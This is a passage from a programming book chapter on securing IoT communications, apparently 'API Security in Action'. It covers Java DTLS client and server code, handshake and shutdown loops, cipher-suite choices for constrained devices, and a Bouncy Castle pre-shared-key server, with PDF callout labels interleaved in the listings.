var address = InetAddress.getByName("localhost");
var engine = sslContext.createEngine(address, 54321);
engine.setUseClientMode(true);
You should then allocate buffers for sending and receiving network packets, and for
holding application data. The SSLSession associated with an engine has methods that
provide hints for the correct size of these buffers, which you can query to ensure you
Listing 12.1
The client SSLContext
Create an
SSLContext
for DTLS.
Load the trusted
CA certificates as
a keystore.
Initialize a Trust-
ManagerFactory
with the trusted
certificates.
Initialize the SSLContext
with the trust manager.
445
Transport layer security
allocate enough space, as shown in the following example code (again, you don’t
need to type this in):
var session = engine.getSession();
var receiveBuffer =
ByteBuffer.allocate(session.getPacketBufferSize());
var sendBuffer =
ByteBuffer.allocate(session.getPacketBufferSize());
var applicationData =
ByteBuffer.allocate(session.getApplicationBufferSize());
These initial buffer sizes are hints, and the engine will tell you if they need to be
resized as you’ll see shortly. Data is moved between buffers by using the following two
method calls, also illustrated in figure 12.2:
sslEngine.wrap(appData, sendBuf) causes the SSLEngine to consume any wait-
ing application data from the appData buffer and write one or more DTLS
packets into the network sendBuf that can then be sent to the other party.
Retrieve the SSLSession
from the engine.
Use the session
hints to correctly
size the data
buffers.
SSLEngine
Wrap operations consume
outgoing application
data and produce DTLS
records to send.
Network
receive
buffer
Network
send buffer
Application
data buffer
DatagramChannel
UDP
wrap()
unwrap()
receive()
send()
wrap()
unwrap()
Unwrap operations consume
received data from the
network and produce
decrypted application data.
A DatagramChannel is
used to send and receive
individual UDP packets.
Figure 12.2
The SSLEngine uses two methods to move data between the
application and network buffers: wrap() consumes application data to send
and writes DTLS packets into the send buffer, while unwrap() consumes data
from the receive buffer and writes unencrypted application data back into the
application buffer.
446
CHAPTER 12
Securing IoT communications
sslEngine.unwrap(recvBuf, appData) instructs the SSLEngine to consume
received DTLS packets from the recvBuf and output any decrypted application
data into the appData buffer.
To start the DTLS handshake, call sslEngine.beginHandshake(). Rather than block-
ing until the handshake is complete, this configures the engine to expect a new DTLS
handshake to begin. Your application code is then responsible for polling the engine
to determine the next action to take and sending or receiving UDP messages as indi-
cated by the engine.
To poll the engine, you call the sslEngine.getHandshakeStatus() method, which
returns one of the following values, as shown in figure 12.3:
NEED_UNWRAP indicates that the engine is waiting to receive a new message from
the server. Your application code should call the receive() method on its UDP
SSLEngine
Network
receive
buffer
Network
send buffer
DatagramChannel
NEED_UNWRAP
NEED_UNWRAP_AGAIN
NEED_WRAP
ExecutorService
NEED_TASK
wrap()
send()
receive()
unwrap()
getDelegatedTask()
run()
NEED_UNWRAP receives a new message
from the network and calls unwrap(), while
NEED_UNWRAP_AGAIN should call unwrap()
with the current network buffer contents.
The NEED_WRAP state occurs when
the SSLEngine needs to send data to
the network. Call wrap() to fill the send
buffer and then send it.
The NEED_TASK state indicates
that the engine needs to run
some expensive tasks. Use an
ExecutorService or just call run()
on each task in turn.
Figure 12.3
The SSLEngine handshake state machine involves four main states. In the NEED_UNWRAP
and NEED_UNWRAP_AGAIN states, you should use the unwrap() call to supply it with received
network data. The NEED_WRAP state indicates that new DTLS packets should be retrieved with the
wrap() call and then sent to the other party. The NEED_TASK state is used when the engine needs
to execute expensive cryptographic functions.
447
Transport layer security
DatagramChannel to receive a packet from the server, and then call the SSLEn-
gine.unwrap() method passing in the data it received.
NEED_UNWRAP_AGAIN indicates that there is remaining input that still needs to be
processed. You should immediately call the unwrap() method again with an
empty input buffer to process the message. This can happen if multiple DTLS
records arrived in a single UDP packet.
NEED_WRAP indicates that the engine needs to send a message to the server. The
application should call the wrap() method with an output buffer that will be
filled with the new DTLS message, which your application should then send to
the server.
NEED_TASK indicates that the engine needs to perform some (potentially expen-
sive) processing, such as performing cryptographic operations. You can call the
getDelegatedTask() method on the engine to get one or more Runnable
objects to execute. The method returns null when there are no more tasks to
run. You can either run these immediately, or you can run them using a back-
ground thread pool if you don’t want to block your main thread while they
complete.
FINISHED indicates that the handshake has just finished, while NOT_HANDSHAK-
ING indicates that no handshake is currently in progress (either it has already
finished or has not been started). The FINISHED status is only generated once
by the last call to wrap() or unwrap() and then the engine will subsequently
produce a NOT_HANDSHAKING status.
Listing 12.2 shows the outline of how the basic loop for performing a DTLS hand-
shake with SSLEngine is performed based on the handshake status codes.
NOTE
This listing has been simplified compared to the implementation in
the GitHub repository accompanying the book, but the core logic is correct.
engine.beginHandshake();
var handshakeStatus = engine.getHandshakeStatus();
while (handshakeStatus != HandshakeStatus.FINISHED) {
SSLEngineResult result;
switch (handshakeStatus) {
case NEED_UNWRAP:
if (recvBuf.position() == 0) {
channel.receive(recvBuf);
}
case NEED_UNWRAP_AGAIN:
result = engine.unwrap(recvBuf.flip(), appData);
recvBuf.compact();
checkStatus(result.getStatus());
handshakeStatus = result.getHandshakeStatus();
break;
Listing 12.2
SSLEngine handshake loop
Trigger a new DTLS
handshake.
Allocate buffers
for network and
application data.
Loop until the
handshake is finished.
In the NEED_UNWRAP state, you
should wait for a network packet
if not already received.
Let the switch
statement fall
through to the
NEED_UNWRAP
_AGAIN case.
Process any
received DTLS
packets by calling
engine.unwrap().
Check the result
status of the unwrap()
call and update the
handshake state.
448
CHAPTER 12
Securing IoT communications
case NEED_WRAP:
result = engine.wrap(appData.flip(), sendBuf);
appData.compact();
channel.write(sendBuf.flip());
sendBuf.compact();
checkStatus(result.getStatus());
handshakeStatus = result.getHandshakeStatus();
break;
case NEED_TASK:
Runnable task;
while ((task = engine.getDelegatedTask()) != null) {
task.run();
}
status = engine.getHandshakeStatus();
default:
throw new IllegalStateException();
}
The wrap() and unwrap() calls return a status code for the operation as well as a new
handshake status, which you should check to ensure that the operation completed
correctly. The possible status codes are shown in table 12.1. If you need to resize a buf-
fer, you can query the current SSLSession to determine the recommended applica-
tion and network buffer sizes and compare that to the amount of space left in the
buffer. If the buffer is too small, you should allocate a new buffer and copy any exist-
ing data into the new buffer. Then retry the operation again.
Using the DtlsDatagramChannel class from the GitHub repository accompanying the
book, you can now implement a working DTLS client example application. The sam-
ple class requires that the underlying UDP channel is connected before the DTLS hand-
shake occurs. This restricts the channel to send packets to only a single host and
receive packets from only that host too. This is not a limitation of DTLS but just a sim-
plification made to keep the sample code short. A consequence of this decision is that
the server that you’ll develop in the next section can only handle a single client at a
time and will discard packets from other clients. It’s not much harder to handle con-
current clients but you need to associate a unique SSLEngine with each client.
Table 12.1
SSLEngine operation status codes
Status code
Meaning
OK
The operation completed successfully.
BUFFER_UNDERFLOW
The operation failed because there was not enough input data. Check that the
input buffer has enough space remaining. For an unwrap operation, you should
receive another network packet if this status occurs.
BUFFER_OVERFLOW
The operation failed because there wasn’t enough space in the output buffer.
Check that the buffer is large enough and resize it if necessary.
CLOSED
The other party has indicated that they are closing the connection, so you
should process any remaining packets and then close the SSLEngine too.
In the
NEED_WRAP
state, call the
wrap() method
and then send
the resulting
DTLS packets.
For NEED_TASK,
just run any
delegated tasks or
submit them to a
thread pool.
449
Transport layer security
DEFINITION
A UDP channel (or socket) is connected when it is restricted to
only send or receive packets from a single host. Using connected channels
simplifies programming and can be more efficient, but packets from other cli-
ents will be silently discarded. The connect() method is used to connect a
Java DatagramChannel.
Listing 12.3 shows a sample client that connects to a server and then sends the con-
tents of a text file line by line. Each line is sent as an individual UDP packet and will be
encrypted using DTLS. After the packets are sent, the client queries the SSLSession
to print out the DTLS cipher suite that was used for the connection. Open the Dtls-
Client.java file you created earlier and add the main method shown in the listing. Cre-
ate a text file named test.txt in the root folder of the project and add some example
text to it, such as lines from Shakespeare, your favorite quotes, or anything you like.
NOTE
You won’t be able to use this client until you write the server to accom-
pany it in the next section.
public static void main(String... args) throws Exception {
try (var channel = new DtlsDatagramChannel(getClientContext());
var in = Files.newBufferedReader(Paths.get("test.txt"))) {
logger.info("Connecting to localhost:54321");
channel.connect("localhost", 54321);
String line;
while ((line = in.readLine()) != null) {
logger.info("Sending packet to server: {}", line);
channel.send(line.getBytes(UTF_8));
}
logger.info("All packets sent");
logger.info("Used cipher suite: {}",
channel.getSession().getCipherSuite());
}
}
After the client completes, it will automatically close the DtlsDatagramChannel, which
will trigger shutdown of the associated SSLEngine object. Closing a DTLS session is
not as simple as just closing the UDP channel, because each party must send each
other a close-notify alert message to signal that the DTLS session is being closed. In
Java, the process is similar to the handshake loop that you saw earlier in listing 12.2.
First, the client should indicate that it will not send any more packets by calling the
closeOutbound() method on the engine. You should then call the wrap() method
to allow the engine to produce the close-notify alert message and send that message to
the server, as shown in listing 12.4. Once the alert has been sent, you should process
incoming messages until you receive a corresponding close-notify from the server, at
Listing 12.3
The DTLS client
Open the DTLS channel with
the client SSLContext.
Open a text file to
send to the server.
Connect to the server running on
the local machine and port 54321.
Send the
lines of text
to the server.
Print details of the
DTLS connection.
450
CHAPTER 12
Securing IoT communications
which point the SSLEngine will return true from the isInboundDone() method and
you can then close the underlying UDP DatagramChannel.
If the other side closes the channel first, then the next call to unwrap() will return
a CLOSED status. In this case, you should reverse the order of operations: first close the
inbound side and process any received messages and then close the outbound side
and send your own close-notify message.
public void close() throws IOException {
sslEngine.closeOutbound();
sslEngine.wrap(appData.flip(), sendBuf);
appData.compact();
channel.write(sendBuf.flip());
sendBuf.compact();
while (!sslEngine.isInboundDone()) {
channel.receive(recvBuf);
sslEngine.unwrap(recvBuf.flip(), appData);
recvBuf.compact();
}
sslEngine.closeInbound();
channel.close();
}
IMPLEMENTING A DTLS SERVER
Initializing a SSLContext for a server is similar to the client, except in this case you use a
KeyManagerFactory to supply the server’s certificate and private key. Because you’re not
using client certificate authentication, you can leave the TrustManager array as null.
Listing 12.5 shows the code for creating a server-side DTLS context. Create a new file
named DtlsServer.java next to the client and type in the contents of the listing.
package com.manning.apisecurityinaction;
import java.io.FileInputStream;
import java.nio.ByteBuffer;
import java.security.KeyStore;
import javax.net.ssl.*;
import org.slf4j.*;
import static java.nio.charset.StandardCharsets.UTF_8;
public class DtlsServer {
private static SSLContext getServerContext() throws Exception {
var sslContext = SSLContext.getInstance("DTLS");
var keyStore = KeyStore.getInstance("PKCS12");
keyStore.load(new FileInputStream("localhost.p12"),
"changeit".toCharArray());
Listing 12.4
Handling shutdown
Listing 12.5
The server SSLContext
Indicate that no further outbound
application packets will be sent.
Call wrap() to generate the
close-notify message and
send it to the server.
Wait until a close-
notify is received
from the server.
Indicate that the inbound
side is now done too and
close the UDP channel.
Create a DTLS
SSLContext
again.
Load the server’s
certificate and
private key from a
keystore.
451
Transport layer security
var keyManager = KeyManagerFactory.getInstance("PKIX");
keyManager.init(keyStore, "changeit".toCharArray());
sslContext.init(keyManager.getKeyManagers(), null, null);
return sslContext;
}
}
In this example, the server will be running on localhost, so use mkcert to generate a
key pair and signed certificate if you don’t already have one, by running2
mkcert -pkcs12 localhost
in the root folder of the project. You can then implement the DTLS server as shown in
listing 12.6. Just as in the client example, you can use the DtlsDatagramChannel class
to simplify the handshake. Behind the scenes, the same handshake process will occur,
but the order of wrap() and unwrap() operations will be different due to the different
roles played in the handshake. Open the DtlsServer.java file you created earlier and
add the main method shown in the listing.
NOTE
The DtlsDatagramChannel provided in the GitHub repository accom-
panying the book will automatically connect the underlying DatagramChannel
to the first client that it receives a packet from and discard packets from other
clients until that client disconnects.
public static void main(String... args) throws Exception {
try (var channel = new DtlsDatagramChannel(getServerContext())) {
channel.bind(54321);
logger.info("Listening on port 54321");
var buffer = ByteBuffer.allocate(2048);
while (true) {
channel.receive(buffer);
buffer.flip();
var data = UTF_8.decode(buffer).toString();
logger.info("Received: {}", data);
buffer.compact();
}
}
}
You can now start the server by running the following command:
mvn clean compile exec:java \
-Dexec.mainClass=com.manning.apisecurityinaction.DtlsServer
2 Refer to chapter 3 if you haven't installed mkcert yet.
Listing 12.6
The DTLS server
Initialize the
KeyManager-
Factory with
the keystore.
Initialize the SSLContext
with the key manager.
Create the
DtlsDatagram-
Channel and
bind to port
54321.
Allocate a buffer
for data received
from the client.
Receive decrypted UDP
packets from the client.
Print out the
received data.
452
CHAPTER 12
Securing IoT communications
This will produce many lines of output as it compiles and runs the code. You’ll see the
following line of output once the server has started up and is listening for UDP pack-
ets from clients:
[com.manning.apisecurityinaction.DtlsServer.main()] INFO
➥ com.manning.apisecurityinaction.DtlsServer - Listening on port
➥ 54321
You can now run the client in another terminal window by running:
mvn clean compile exec:java \
-Dexec.mainClass=com.manning.apisecurityinaction.DtlsClient
TIP
If you want to see details of the DTLS protocol messages being sent
between the client and server, add the argument -Djavax.net.debug=all to
the Maven command line. This will produce detailed logging of the hand-
shake messages.
The client will start up, connect to the server, and send all of the lines of text from the
input file to the server, which will receive them all and print them out. After the client
has completed, it will print out the DTLS cipher suite that it used so that you can see
what was negotiated. In the next section, you’ll see how the default choice made by
Java might not be appropriate for IoT applications and how to choose a more suitable
replacement.
NOTE
This example is intended to demonstrate the use of DTLS only and is
not a production-ready network protocol. If you separate the client and server
over a network, it is likely that some packets will get lost. Use a higher-level
application protocol such as CoAP if your application requires reliable packet
delivery (or use normal TLS over TCP).
12.1.2 Cipher suites for constrained devices
In previous chapters, you’ve followed the guidance from Mozilla3 when choosing
secure TLS cipher suites (recall from chapter 7 that a cipher suite is a collection of cryp-
tographic algorithms chosen to work well together). This guidance is aimed at secur-
ing traditional web server applications and their clients, but these cipher suites are
not always suitable for IoT use for several reasons:
The size of code required to implement these suites securely can be quite large
and require many cryptographic primitives. For example, the cipher suite
ECDHE-RSA-AES256-SHA384 requires implementing Elliptic Curve Diffie-Hellman
(ECDH) key agreement, RSA signatures, AES encryption and decryption opera-
tions, and the SHA-384 hash function with HMAC!
3 See https://wiki.mozilla.org/Security/Server_Side_TLS.
453
Transport layer security
Modern recommendations heavily promote the use of AES in Galois/Counter
Mode (GCM), because this is extremely fast and secure on modern Intel chips
due to hardware acceleration. But it can be difficult to implement securely in
software on constrained devices and fails catastrophically if misused.
Some cryptographic algorithms, such as SHA-512 or SHA-384, are rarely hardware-
accelerated and are designed to perform well when implemented in software on
64-bit architectures. There can be a performance penalty when implementing
these algorithms on 32-bit architectures, which are very common in IoT devices.
In low-power environments, 8-bit microcontrollers are still commonly used,
which makes implementing such algorithms even more challenging.
Modern recommendations concentrate on cipher suites that provide forward
secrecy as discussed in chapter 7 (also known as perfect forward secrecy). This is a
very important security property, but it increases the computational cost of
these cipher suites. All of the forward secret cipher suites in TLS require imple-
menting both a signature algorithm (such as RSA) and a key agreement algo-
rithm (usually, ECDH), which increases the code size.4
Nonce reuse and AES-GCM in DTLS
The most popular symmetric authenticated encryption mode used in modern TLS
applications is based on AES in Galois/Counter Mode (GCM). GCM requires that each
packet is encrypted using a unique nonce and loses almost all security if the same
nonce is used to encrypt two different packets. When GCM was first introduced for
TLS 1.2, it required an 8-byte nonce to be explicitly sent with every record. Although
this nonce could be a simple counter, some implementations decided to generate it
randomly. Because 8 bytes is not large enough to safely generate randomly, these
implementations were found to be susceptible to accidental nonce reuse. To prevent
this problem, TLS 1.3 introduced a new scheme based on implicit nonces: the nonce
for a TLS record is derived from the sequence number that TLS already keeps track
of for each connection. This was a significant security improvement because TLS
implementations must accurately keep track of the record sequence number to
ensure proper operation of the protocol, so accidental nonce reuse will result in an
immediate protocol failure (and is more likely to be caught by tests). You can read
more about this development at https://blog.cloudflare.com/tls-nonce-nse/.
Due to the unreliable nature of UDP-based protocols, DTLS requires that record
sequence numbers are explicitly added to all packets so that retransmitted or reor-
dered packets can be detected and handled. Combined with the fact that DTLS is
more lenient of duplicate packets, this makes accidental nonce reuse bugs in DTLS
applications using AES GCM more likely. You should therefore prefer alternative
cipher suites when using DTLS, such as those discussed in this section. In section
12.3.3, you’ll learn about authenticated encryption algorithms you can use in your
application that are more robust against nonce reuse.
4 Thomas Pornin, the author of the BearSSL library, has detailed notes on the cost of different TLS crypto-
graphic algorithms at https://bearssl.org/support.html.
454
CHAPTER 12
Securing IoT communications
Figure 12.4 shows an overview of the software components and algorithms that are
required to support a set of TLS cipher suites that are commonly used for web con-
nections. TLS supports a variety of key exchange algorithms used during the initial
handshake, each of which needs different cryptographic primitives to be imple-
mented. Some of these also require digital signatures to be implemented, again with
several choices of algorithms. Some signature algorithms support different group
parameters, such as elliptic curves used for ECDSA signatures, which require further
code. After the handshake completes, there are several choices for cipher modes and
MAC algorithms for securing application data. X.509 certificate authentication itself
requires additional code. This can add up to a significant amount of code to include
on a constrained device.
Signature algorithms
RSA
DSA
ECDSA
Key exchange algorithms
RSA
Static DH
Static ECDH
DHE
ECDHE
Elliptic curves
secp256r1
secp384r1
Ciphers
AES-CBC
AES-GCM
ChaCha20-
Poly1305
MACs
HMAC-
SHA-256
HMAC-
SHA-384
X.509 certificate
parsing
X.509 certificate
validation
Revocation checking
OCSP
CRL
Key exchange algorithms and signatures are used
during the initial handshake to establish session keys.
Cipher and MAC algorithms are
used for bulk encryption and
authentication of application data.
Certificate validation and revocation
checking involves a lot of complex code.
Figure 12.4
A cross-section of algorithms and components that must be implemented
to support common TLS web connections. Key exchange and signature algorithms are
used during the initial handshake, and then cipher modes and MACs are used to secure
application data once a session has been established. X.509 certificates require a lot
of complex code for parsing, validation, and checking for revoked certificates.
455
Transport layer security
For these reasons, other cipher suites are often popular in IoT applications. As an
alternative to forward secret cipher suites, there are older cipher suites based on
either RSA encryption or static Diffie-Hellman key agreement (or the elliptic curve
variant, ECDH). Unfortunately, both algorithm families have significant security weak-
nesses, not directly related to their lack of forward secrecy. RSA key exchange uses an
old mode of encryption (known as PKCS#1 version 1.5) that is very hard to implement
securely and has resulted in many vulnerabilities in TLS implementations. Static
ECDH key agreement has potential security weaknesses of its own, such as invalid
curve attacks that can reveal the server’s long-term private key; it is rarely implemented.
For these reasons, you should prefer forward secret cipher suites whenever possible,
as they provide better protection against common cryptographic vulnerabilities. TLS
1.3 has completely removed these older modes due to their insecurity.
DEFINITION
An invalid curve attack is an attack on elliptic curve cryptographic
keys. An attacker sends the victim a public key on a different (but related)
elliptic curve to the victim’s private key. If the victim’s TLS library doesn’t val-
idate the received public key carefully, then the result may leak information
about their private key. Although ephemeral ECDH cipher suites (those with
ECDHE in the name) are also vulnerable to invalid curve attacks, they are
much harder to exploit because each private key is only used once.
Even if you use an older cipher suite, a DTLS implementation is required to include
support for signatures in order to validate certificates that are presented by the server
(and optionally by the client) during the handshake. An extension to TLS and DTLS
allows certificates to be replaced with raw public keys (https://tools.ietf.org/html/
rfc7250). This allows the complex certificate parsing and validation code to be elimi-
nated, along with support for many signature algorithms, resulting in a large reduc-
tion in code size. The downside is that keys must instead be manually distributed to all
devices, but this can be a viable approach in some environments. Another alternative
is to use pre-shared keys, which you’ll learn more about in section 12.2.
DEFINITION
Raw public keys can be used to eliminate the complex code required
to parse and verify X.509 certificates and verify signatures over those certifi-
cates. A raw public key must be manually distributed to devices over a secure
channel (for example, during manufacture).
The situation is somewhat better when you look at the symmetric cryptography used
to secure application data after the TLS handshake and key exchange has completed.
There are two alternative cryptographic algorithms that can be used instead of the
usual AES-GCM and AES-CBC modes:
Cipher suites based on AES in CCM mode provide authenticated encryption using
only an AES encryption circuit, providing a reduction in code size compared to
CBC mode and is a bit more robust compared to GCM. CCM has become widely
adopted in IoT applications and standards, but it has some undesirable features
456
CHAPTER 12
Securing IoT communications
too, as discussed in a critique of the mode by Phillip Rogaway and David Wagner
(https://web.cs.ucdavis.edu/~rogaway/papers/ccm.pdf).
The ChaCha20-Poly1305 cipher suites can be implemented securely in software
with relatively little code and good performance on a range of CPU architec-
tures. Google adapted these cipher suites for TLS to provide better perfor-
mance and security on mobile devices that lack AES hardware acceleration.
DEFINITION
AES-CCM (Counter with CBC-MAC) is an authenticated encryp-
tion algorithm based solely on the use of an AES encryption circuit for all
operations. It uses AES in Counter mode for encryption and decryption, and
a Message Authentication Code (MAC) based on AES in CBC mode for
authentication. ChaCha20-Poly1305 is a stream cipher and MAC designed by
Daniel Bernstein that is very fast and easy to implement in software.
Both of these choices have fewer weaknesses compared to either AES-GCM or the
older AES-CBC modes when implemented on constrained devices.5 If your devices
have hardware support for AES, for example in a dedicated secure element chip, then
CCM can be an attractive choice. In most other cases, ChaCha20-Poly1305 can be eas-
ier to implement securely. Java has support for ChaCha20-Poly1305 cipher suites since
Java 12. If you have Java 12 installed, you can force the use of ChaCha20-Poly1305 by
specifying a custom SSLParameters object and passing it to the setSSLParameters()
method on the SSLEngine. Listing 12.7 shows how to configure the parameters to
only allow ChaCha20-Poly1305-based cipher suites. If you have Java 12, open the Dtls-
Client.java file and add the new method to the class. Otherwise, skip this example.
TIP
If you need to support servers or clients running older versions of DTLS,
you should add the TLS_EMPTY_RENEGOTIATION_INFO_SCSV marker cipher
suite. Otherwise Java may be unable to negotiate a connection with some
older software. This cipher suite is enabled by default so be sure to re-enable
it when specifying custom cipher suites.
private static SSLParameters sslParameters() {
var params = DtlsDatagramChannel.defaultSslParameters();
params.setCipherSuites(new String[] {
"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256",
"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256",
"TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256",
"TLS_EMPTY_RENEGOTIATION_INFO_SCSV"
});
return params;
}
5 ChaCha20-Poly1305 also suffers from nonce reuse problems similar to GCM, but to a lesser extent. GCM loses
all authenticity guarantees after a single nonce reuse, while ChaCha20-Poly1305 only loses these guarantees
for messages encrypted with the duplicate nonce.
Listing 12.7
Forcing use of ChaCha20-Poly1305
Use the
defaults
from the
DtlsDatagram-
Channel.
Enable only
cipher suites that
use ChaCha20-
Poly1305.
Include this cipher suite
if you need to support
multiple DTLS versions.
457
Transport layer security
After adding the new method, you can update the call to the DtlsDatagramChannel
constructor in the same file to pass the custom parameters:
try (var channel = new DtlsDatagramChannel(getClientContext(),
sslParameters());
If you make that change and re-run the client, you’ll see that the connection now uses
ChaCha20-Poly1305, so long as both the client and server are using Java 12 or later.
WARNING
The example in listing 12.7 uses the default parameters from the
DtlsDatagramChannel class. If you create your own parameters, ensure that
you set an endpoint identification algorithm. Otherwise, Java won’t validate
that the server’s certificate matches the hostname you have connected to and
the connection may be vulnerable to man-in-the-middle attacks. You can set
the identification algorithm by calling "params.setEndpointIdentication-
Algorithm("HTTPS")".
AES-CCM is not yet supported by Java, although work is in progress to add support.
The Bouncy Castle library (https://www.bouncycastle.org/java.html) supports CCM
cipher suites with DTLS, but only through a different API and not the standard SSL-
Engine API. There’s an example using the Bouncy Castle DTLS API with CCM in sec-
tion 12.2.1.
The CCM cipher suites come in two variations:
The original cipher suites, whose names end in _CCM, use a 128-bit authentica-
tion tag.
Cipher suites ending in _CCM_8, which use a shorter 64-bit authentication tag.
This can be useful if you need to save every byte in network messages but pro-
vides much weaker protections against message forgery and tampering.
You should therefore prefer using the variants with a 128-bit authentication tag unless
you have other measures in place to prevent message forgery, such as strong network
protections, and you know that you need to reduce network overheads. You should
apply strict rate-limiting to API endpoints where there is a risk of brute force attacks
against authentication tags; see chapter 3 for details on how to apply rate-limiting.
Pop quiz
1
Which SSLEngine handshake status indicates that a message needs to be sent
across the network?
a
NEED_TASK
b
NEED_WRAP
c
NEED_UNWRAP
d
NEED_UNWRAP_AGAIN
458
CHAPTER 12
Securing IoT communications
12.2
Pre-shared keys
In some particularly constrained environments, devices may not be capable of carry-
ing out the public key cryptography required for a TLS handshake. For example, tight
constraints on available memory and code size may make it hard to support public key
signature or key-agreement algorithms. In these environments, you can still use TLS
(or DTLS) by using cipher suites based on pre-shared keys (PSK) instead of certificates
for authentication. PSK cipher suites can result in a dramatic reduction in the amount
of code needed to implement TLS, as shown in figure 12.5, because the certificate pars-
ing and validation code, along with the signatures and public key exchange modes can
all be eliminated.
DEFINITION
A pre-shared key (PSK) is a symmetric key that is directly shared
with the client and server ahead of time. A PSK can be used to avoid the over-
heads of public key cryptography on constrained devices.
In TLS 1.2 and DTLS 1.2, a PSK can be used by specifying dedicated PSK cipher suites
such as TLS_PSK_WITH_AES_128_CCM. In TLS 1.3 and the upcoming DTLS 1.3, use of a
PSK is negotiated using an extension that the client sends in the initial ClientHello
message. Once a PSK cipher suite has been selected, the server and client derive ses-
sion keys from the PSK and random values that they each contribute during the hand-
shake, ensuring that unique keys are still used for every session. The session key is
used to compute a HMAC tag over all of the handshake messages, providing authenti-
cation of the session: only somebody with access to the PSK could derive the same
HMAC key and compute the correct authentication tag.
CAUTION
Although unique session keys are generated for each session, the
basic PSK cipher suites lack forward secrecy: an attacker that compromises
the PSK can easily derive the session keys for every previous session if they
captured the handshake messages. Section 12.2.4 discusses PSK cipher suites
with forward secrecy.
Because PSK is based on symmetric cryptography, with the client and server both
using the same key, it provides mutual authentication of both parties. Unlike client
(continued)
2
Which one of the following is an increased risk when using AES-GCM cipher
suites for IoT applications compared to other modes?
a
A breakthrough attack on AES
b
Nonce reuse leading to a loss of security
c
Overly large ciphertexts causing packet fragmentation
d
Decryption is too expensive for constrained devices
The answers are at the end of the chapter.
459
Pre-shared keys
certificate authentication, however, there is no name associated with the client apart
from an opaque identifier for the PSK, so a server must maintain a mapping between
PSKs and the associated client or rely on another method for authenticating the cli-
ent’s identity.
WARNING
Although TLS allows the PSK to be any length, you should only
use a PSK that is cryptographically strong, such as a 128-bit value from a
secure random number generator. PSK cipher suites are not suitable for use
with passwords because an attacker can perform an offline dictionary or
brute-force attack after seeing one PSK handshake.
Signature algorithms
RSA
DSA
ECDSA
Key exchange algorithms
PSK
RSA
Static ECDH
DHE
ECDHE
Elliptic curves
secp256r1
secp384r1
Ciphers
AES-CCM
AES-GCM
ChaCha20-
Poly1305
MACs
HMAC-
SHA-256
HMAC-
SHA-384
X.509 certificate
parsing
X.509 certificate
validation
Revocation checking
OCSP
CRL
Only a single simple key exchange algorithm is required.
Unsuitable cipher algorithms can be
dropped in favor of low-footprint choices
such as AES-CCM or ChaCha20-Poly 305.
1
HMAC is still required for key derivation
and authentication.
All the complex and error-prone
certificate parsing and validation
code can be removed.
Figure 12.5
Use of pre-shared key (PSK) cipher suites allows implementations to remove a
lot of complex code from a TLS implementation. Signature algorithms are no longer needed
at all and can be removed, as can most key exchange algorithms. The complex X.509
certificate parsing and validation logic can be deleted too, leaving only the basic symmetric
cryptography primitives.
460
CHAPTER 12
Securing IoT communications
12.2.1 Implementing a PSK server
Listing 12.8 shows how to load a PSK from a keystore. For this example, you can load
the existing HMAC key that you created in chapter 6, but it is good practice to use dis-
tinct keys for different uses within an application even if they happen to use the same
algorithm. A PSK is just a random array of bytes, so you can call the getEncoded()
method to get the raw bytes from the Key object. Create a new file named Psk-
Server.java under src/main/java/com/manning/apisecurityinaction and copy in the
contents of the listing. You’ll flesh out the rest of the server in a moment.
package com.manning.apisecurityinaction;
import static java.nio.charset.StandardCharsets.UTF_8;
import java.io.FileInputStream;
import java.net.*;
import java.security.*;
import org.bouncycastle.tls.*;
import org.bouncycastle.tls.crypto.impl.bc.BcTlsCrypto;
public class PskServer {
static byte[] loadPsk(char[] password) throws Exception {
var keyStore = KeyStore.getInstance("PKCS12");
keyStore.load(new FileInputStream("keystore.p12"), password);
return keyStore.getKey("hmac-key", password).getEncoded();
}
}
Listing 12.9 shows a basic DTLS server with pre-shared keys written using the Bouncy
Castle API. The following steps are used to initialize the server and perform a PSK
handshake with the client:
First load the PSK from the keystore.
Then you need to initialize a PSKTlsServer object, which requires two argu-
ments: a BcTlsCrypto object and a TlsPSKIdentityManager, that is used to look
up the PSK for a given client. You’ll come back to the identity manager shortly.
The PSKTlsServer class only advertises support for normal TLS by default,
although it supports DTLS just fine. Override the getSupportedVersions()
method to ensure that DTLS 1.2 support is enabled; otherwise, the hand-
shake will fail. The supported protocol versions are communicated during the
handshake and some clients may fail if there are both TLS and DTLS versions
in the list.
Just like the DtlsDatagramChannel you used before, Bouncy Castle requires
the UDP socket to be connected before the DTLS handshake occurs. Because
the server doesn’t know where the client is located, you can wait until a packet
is received from any client and then call connect() with the socket address of
the client.
Listing 12.8
Loading a PSK
Load the
keystore.
Load the key and
extract the raw bytes.
461
Pre-shared keys
Create a DTLSServerProtocol and UDPTransport objects, and then call the
accept method on the protocol object to perform the DTLS handshake. This
returns a DTLSTransport object that you can then use to send and receive
encrypted and authenticated packets with the client.
TIP
Although the Bouncy Castle API is straightforward when using PSKs, I
find it cumbersome and hard to debug if you want to use certificate authenti-
cation, and I prefer the SSLEngine API.
public static void main(String[] args) throws Exception {
var psk = loadPsk(args[0].toCharArray());
var crypto = new BcTlsCrypto(new SecureRandom());
var server = new PSKTlsServer(crypto, getIdentityManager(psk)) {
@Override
protected ProtocolVersion[] getSupportedVersions() {
return ProtocolVersion.DTLSv12.only();
}
};
var buffer = new byte[2048];
var serverSocket = new DatagramSocket(54321);
var packet = new DatagramPacket(buffer, buffer.length);
serverSocket.receive(packet);
serverSocket.connect(packet.getSocketAddress());
var protocol = new DTLSServerProtocol();
var transport = new UDPTransport(serverSocket, 1500);
var dtls = protocol.accept(server, transport);
while (true) {
var len = dtls.receive(buffer, 0, buffer.length, 60000);
if (len == -1) break;
var data = new String(buffer, 0, len, UTF_8);
System.out.println("Received: " + data);
}
}
The missing part of the puzzle is the PSK identity manager, which is responsible for
determining which PSK to use with each client. Listing 12.10 shows a very simple
implementation of this interface for the example, which returns the same PSK for
every client. The client sends an identifier as part of the PSK handshake, so a more
sophisticated implementation could look up different PSKs for each client. The server
can also provide a hint to help the client determine which PSK it should use, in case it
has multiple PSKs. You can leave this null here, which instructs the server not to send
a hint. Open the PskServer.java file and add the method from listing 12.10 to com-
plete the server implementation.
TIP
A scalable solution would be for the server to generate distinct PSKs for
each client from a master key using HKDF, as discussed in chapter 11.
Listing 12.9
DTLS PSK server
Load the PSK from
the keystore.
Create a new
PSKTlsServer
and override
the supported
versions to
allow DTLS.
BouncyCastle
requires the socket
to be connected
before the
handshake.
Create a DTLS
protocol and
perform the
handshake using
the PSK.
Receive
messages from
